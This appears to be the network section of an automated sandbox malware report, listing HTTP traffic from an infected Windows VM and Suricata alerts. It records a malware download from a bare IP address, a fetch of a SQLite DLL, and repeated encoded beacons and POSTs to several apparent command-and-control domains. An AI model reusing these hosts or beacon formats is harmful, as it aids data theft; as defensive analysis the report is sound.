Network Analysis
- TCP Requests
- UDP Requests
GET
200
http://50.3.182.140/350/audiodg.exe
GET /350/audiodg.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 50.3.182.140
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 30 Sep 2023 04:20:56 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
Last-Modified: Wed, 27 Sep 2023 22:43:11 GMT
ETag: "6f58a-6065eea85699a"
Accept-Ranges: bytes
Content-Length: 456074
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
POST
0
http://www.whistle.news/c8nr/
POST /c8nr/ HTTP/1.1
Host: www.whistle.news
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.whistle.news
Referer: http://www.whistle.news/c8nr/
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
Cache-Control: max-age=0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
GET
200
http://www.whistle.news/c8nr/?F3=CqYf1SmszDBRcRt3Ry7nuhva6EmhLI5UD2I/eVu+u8EOQktcJMnp9pGxshpp5J7Zxswa5jm29s59MM0LkVDS8/fxra0kqVJlH6+elnA=&rT=Nt-TZZTkeRdw
GET /c8nr/?F3=CqYf1SmszDBRcRt3Ry7nuhva6EmhLI5UD2I/eVu+u8EOQktcJMnp9pGxshpp5J7Zxswa5jm29s59MM0LkVDS8/fxra0kqVJlH6+elnA=&rT=Nt-TZZTkeRdw HTTP/1.1
Host: www.whistle.news
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-us
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
HTTP/1.1 200 OK
Server: hcdn
Date: Sat, 30 Sep 2023 04:21:30 GMT
Content-Type: text/html
Content-Length: 10066
Connection: close
Vary: Accept-Encoding
x-hcdn-request-id: b41e745a4054b4538bb344d7d316eae9-srv-edge1
Expires: Sat, 30 Sep 2023 04:21:29 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
GET
200
http://www.sqlite.org/2017/sqlite-dll-win32-x86-3210000.zip
GET /2017/sqlite-dll-win32-x86-3210000.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Host: www.sqlite.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: keep-alive
Date: Sat, 30 Sep 2023 04:21:31 GMT
Last-Modified: Thu, 18 Jan 2018 20:17:17 GMT
Cache-Control: max-age=120
ETag: "m5a6100cds6cee7"
Content-type: application/zip; charset=utf-8
Content-length: 446183
POST
0
http://www.charcoal-id.com/c8nr/
POST /c8nr/ HTTP/1.1
Host: www.charcoal-id.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.charcoal-id.com
Referer: http://www.charcoal-id.com/c8nr/
Content-Type: application/x-www-form-urlencoded
Content-Length: 3407
Cache-Control: max-age=0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
POST
301
http://www.charcoal-id.com/c8nr/
POST /c8nr/ HTTP/1.1
Host: www.charcoal-id.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.charcoal-id.com
Referer: http://www.charcoal-id.com/c8nr/
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
Cache-Control: max-age=0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
HTTP/1.1 301 Moved Permanently
Connection: close
content-type: text/html
content-length: 707
date: Sat, 30 Sep 2023 04:21:44 GMT
server: LiteSpeed
location: https://www.charcoal-id.com/c8nr/
GET
301
http://www.charcoal-id.com/c8nr/?F3=6JSHidr3Bn2iwSUtC4PW4Gvpxg89xUQjO4aPVvfz4xZu1RX38nUjyBfg1u2hjWOcq5dMLqFxHMQyk/L5KrgEpXnP9NcgGvuA1NBUhr0=&rT=Nt-TZZTkeRdw
GET /c8nr/?F3=6JSHidr3Bn2iwSUtC4PW4Gvpxg89xUQjO4aPVvfz4xZu1RX38nUjyBfg1u2hjWOcq5dMLqFxHMQyk/L5KrgEpXnP9NcgGvuA1NBUhr0=&rT=Nt-TZZTkeRdw HTTP/1.1
Host: www.charcoal-id.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-us
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
HTTP/1.1 301 Moved Permanently
Connection: close
content-type: text/html
content-length: 707
date: Sat, 30 Sep 2023 04:21:46 GMT
server: LiteSpeed
location: https://www.charcoal-id.com/c8nr/?F3=6JSHidr3Bn2iwSUtC4PW4Gvpxg89xUQjO4aPVvfz4xZu1RX38nUjyBfg1u2hjWOcq5dMLqFxHMQyk/L5KrgEpXnP9NcgGvuA1NBUhr0=&rT=Nt-TZZTkeRdw
POST
404
http://www.waremart.top/c8nr/
POST /c8nr/ HTTP/1.1
Host: www.waremart.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.waremart.top
Referer: http://www.waremart.top/c8nr/
Content-Type: application/x-www-form-urlencoded
Content-Length: 3407
Cache-Control: max-age=0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
HTTP/1.1 404 Not Found
Date: Sat, 30 Sep 2023 04:21:52 GMT
Server: Apache
Content-Length: 16052
Connection: close
Content-Type: text/html
POST
404
http://www.waremart.top/c8nr/
POST /c8nr/ HTTP/1.1
Host: www.waremart.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.waremart.top
Referer: http://www.waremart.top/c8nr/
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
Cache-Control: max-age=0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
HTTP/1.1 404 Not Found
Date: Sat, 30 Sep 2023 04:21:55 GMT
Server: Apache
Content-Length: 16052
Connection: close
Content-Type: text/html
GET
404
http://www.waremart.top/c8nr/?F3=KVXIGGOevITGxD2WQvY/uYGCDwnSgtX62kxPYtz8ySb+fzNjXSoJfn3Gb7fCEKXq0Dt0VHGAWvVKgT6TbMH6cQbNJ8bX2L8nNVJJ3fQ=&rT=Nt-TZZTkeRdw
GET /c8nr/?F3=KVXIGGOevITGxD2WQvY/uYGCDwnSgtX62kxPYtz8ySb+fzNjXSoJfn3Gb7fCEKXq0Dt0VHGAWvVKgT6TbMH6cQbNJ8bX2L8nNVJJ3fQ=&rT=Nt-TZZTkeRdw HTTP/1.1
Host: www.waremart.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-us
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
HTTP/1.1 404 Not Found
Date: Sat, 30 Sep 2023 04:21:57 GMT
Server: Apache
Content-Length: 16052
Connection: close
Content-Type: text/html; charset=utf-8
POST
200
http://www.calculaqui.com/c8nr/
POST /c8nr/ HTTP/1.1
Host: www.calculaqui.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.calculaqui.com
Referer: http://www.calculaqui.com/c8nr/
Content-Type: application/x-www-form-urlencoded
Content-Length: 3407
Cache-Control: max-age=0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
HTTP/1.1 200 OK
Date: Sat, 30 Sep 2023 04:22:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: ch1c=b
Content-Security-Policy: frame-ancestors 'none';
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w0kvzPvPU3Wv3J8A8rgMUiT9ItGVUWzaDfVJ8yDp%2Buf7Ajyydr8BBr7549a78rwVJF%2BGHVRuJBVgC4sAloGX1cXjM79L63P7Kzimnf3YQA7TKYJbX9KVSxDRBuOAVWwqR51ek0I%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 80e9aebe5ee18310-KIX
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
POST
200
http://www.calculaqui.com/c8nr/
POST /c8nr/ HTTP/1.1
Host: www.calculaqui.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.calculaqui.com
Referer: http://www.calculaqui.com/c8nr/
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
Cache-Control: max-age=0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
HTTP/1.1 200 OK
Date: Sat, 30 Sep 2023 04:22:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: ch1c=b
Content-Security-Policy: frame-ancestors 'none';
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KeV8JtnedXguJfPeCoHuka7CKoJy6Z3fzKKYrjsIoQl4FjfIcxkw9RSnmvRjOToBRS6NC0aDnh1i3ODQnAhCIsrx4OEYfqwRDx0Wwwhrq%2FHGIPY3%2BHJ6QzWd4vZx1yyFdzGQ5vU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 80e9aece1c8817bb-KIX
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
GET
200
http://www.calculaqui.com/c8nr/?F3=OjdZwvBuU/ug8o3d94DJyrhInUGEGcqmO1sXFb6TuBXVHy3dgl4nqyV+jYs1QF37euEKRExOzrzz3hz7a5wEHeU8OO/DqHfi+/lveaw=&rT=Nt-TZZTkeRdw
GET /c8nr/?F3=OjdZwvBuU/ug8o3d94DJyrhInUGEGcqmO1sXFb6TuBXVHy3dgl4nqyV+jYs1QF37euEKRExOzrzz3hz7a5wEHeU8OO/DqHfi+/lveaw=&rT=Nt-TZZTkeRdw HTTP/1.1
Host: www.calculaqui.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-us
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
HTTP/1.1 200 OK
Date: Sat, 30 Sep 2023 04:22:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: ch1c=b
Content-Security-Policy: frame-ancestors 'none';
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GrbtCmGNd4U3QdtmxBe8TlXy5hTQRNKDsANguVpxKoB9DAxde2ceAfbCM7vwoQE4qO4HkJka%2FryKeZRFNYsaNHGDt99Hz6k4bUFQdFwb221N792tZHX6jZkstYKqruzGvHdl54M%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 80e9aeddfdf91a18-KIX
alt-svc: h3=":443"; ma=86400
POST
404
http://www.banking-products.com/c8nr/
POST /c8nr/ HTTP/1.1
Host: www.banking-products.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.banking-products.com
Referer: http://www.banking-products.com/c8nr/
Content-Type: application/x-www-form-urlencoded
Content-Length: 3407
Cache-Control: max-age=0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
HTTP/1.1 404 Not Found
Date: Sat, 30 Sep 2023 04:22:28 GMT
Server: Apache
Last-Modified: Tue, 29 Aug 2023 07:21:10 GMT
ETag: "8271-6040aa7bb7586"
Accept-Ranges: bytes
Content-Length: 33393
Connection: close
Content-Type: text/html; charset=UTF-8
POST
404
http://www.banking-products.com/c8nr/
POST /c8nr/ HTTP/1.1
Host: www.banking-products.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.banking-products.com
Referer: http://www.banking-products.com/c8nr/
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
Cache-Control: max-age=0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
HTTP/1.1 404 Not Found
Date: Sat, 30 Sep 2023 04:22:31 GMT
Server: Apache
Last-Modified: Tue, 29 Aug 2023 07:21:10 GMT
ETag: "8271-6040aa7bb7586"
Accept-Ranges: bytes
Content-Length: 33393
Connection: close
Content-Type: text/html; charset=UTF-8
GET
404
http://www.banking-products.com/c8nr/?F3=ENL5hTb1LcB7CURkiczdT+ejQGmla3oISTfQo2/YV4hNHnoLkBSgmjHFVmlBRdxgRm3zMdu0VU9DbjiUlLDYulW193G769XwZ3GN77g=&rT=Nt-TZZTkeRdw
GET /c8nr/?F3=ENL5hTb1LcB7CURkiczdT+ejQGmla3oISTfQo2/YV4hNHnoLkBSgmjHFVmlBRdxgRm3zMdu0VU9DbjiUlLDYulW193G769XwZ3GN77g=&rT=Nt-TZZTkeRdw HTTP/1.1
Host: www.banking-products.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-us
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
HTTP/1.1 404 Not Found
Date: Sat, 30 Sep 2023 04:22:33 GMT
Server: Apache
Last-Modified: Tue, 29 Aug 2023 07:21:10 GMT
ETag: "8271-6040aa7bb7586"
Accept-Ranges: bytes
Content-Length: 33393
Connection: close
Content-Type: text/html; charset=UTF-8
POST
404
http://www.freeprosoftz.download/c8nr/
POST /c8nr/ HTTP/1.1
Host: www.freeprosoftz.download
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.freeprosoftz.download
Referer: http://www.freeprosoftz.download/c8nr/
Content-Type: application/x-www-form-urlencoded
Content-Length: 3407
Cache-Control: max-age=0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
HTTP/1.1 404 Not Found
Date: Sat, 30 Sep 2023 04:22:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-UA-Compatible: IE=edge
Link: <https://freeprosoftz.download/wp-json/>; rel="https://api.w.org/"
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GeXE3FU06RLZUS1knPhq7k3AllU2RHK99qPgxg3AnxdVLUh3QcPELH4IcbTUXzch4BeZqZ7ams1rlYKrDfAj8qMKfL60lHOII8FKKf2JxoTfIE%2Be74wNEvUxDHcHVypSLNZnGnYCLSlOaDbk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 80e9af9f4a948358-KIX
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
POST
404
http://www.freeprosoftz.download/c8nr/
POST /c8nr/ HTTP/1.1
Host: www.freeprosoftz.download
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.freeprosoftz.download
Referer: http://www.freeprosoftz.download/c8nr/
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
Cache-Control: max-age=0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
HTTP/1.1 404 Not Found
Date: Sat, 30 Sep 2023 04:22:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-UA-Compatible: IE=edge
Link: <https://freeprosoftz.download/wp-json/>; rel="https://api.w.org/"
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=i%2FNNTaBV2jNeSiESonnTR4K8VtmCe74o6wOGY7y3c0EUwwvWhhnAD7b4JlyTdP2YBKTDS1yv5sQojS8Z5WEMVowMuvLz%2FQgWzvKHg63%2BootdkIpqKX74Xg%2BafbGHc04mTAKhO1QbyoUd5IPF"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 80e9afaf0e3619c8-KIX
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
GET
301
http://www.freeprosoftz.download/c8nr/?F3=QwWL61OjL6Zjup2of9u7xYwZUk4i9WyrtzOogSBq0fTkVXlsW82z9ucnH56cGKu7VeAvdm+QQh0mLF61TehwZUGfckypRxLgmJoqexY=&rT=Nt-TZZTkeRdw
GET /c8nr/?F3=QwWL61OjL6Zjup2of9u7xYwZUk4i9WyrtzOogSBq0fTkVXlsW82z9ucnH56cGKu7VeAvdm+QQh0mLF61TehwZUGfckypRxLgmJoqexY=&rT=Nt-TZZTkeRdw HTTP/1.1
Host: www.freeprosoftz.download
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-us
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
HTTP/1.1 301 Moved Permanently
Date: Sat, 30 Sep 2023 04:22:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-UA-Compatible: IE=edge
X-Redirect-By: WordPress
Vary: Accept-Encoding
Location: http://freeprosoftz.download/c8nr/?F3=QwWL61OjL6Zjup2of9u7xYwZUk4i9WyrtzOogSBq0fTkVXlsW82z9ucnH56cGKu7VeAvdm+QQh0mLF61TehwZUGfckypRxLgmJoqexY=&rT=Nt-TZZTkeRdw
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rd5DtL%2Fx73cpA8iTLUC0R7YhZIXoooB2MZtX7kjWgoNfJqqAs7NE06F%2B1stDvYZW5Roqods8Ju1tCmXH9NYQODUdDZjXHQsGL6v2fyy0XBFNswAzKlSwuUXUmNYuInT0YH0GMzlbTXTgsxpM"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 80e9afbeda308316-KIX
alt-svc: h3=":443"; ma=86400
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| UDP 192.168.56.103:62576 -> 164.124.101.2:53 | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | Potentially Bad Traffic |
| TCP 192.168.56.103:49162 -> 50.3.182.140:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | Potentially Bad Traffic |
| TCP 50.3.182.140:80 -> 192.168.56.103:49162 | 2022050 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 | A Network Trojan was detected |
| TCP 192.168.56.103:49177 -> 162.0.213.94:80 | 2023882 | ET INFO HTTP Request to a *.top domain | Potentially Bad Traffic |
| TCP 50.3.182.140:80 -> 192.168.56.103:49162 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
| TCP 50.3.182.140:80 -> 192.168.56.103:49162 | 2022051 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 | A Network Trojan was detected |
| TCP 50.3.182.140:80 -> 192.168.56.103:49162 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts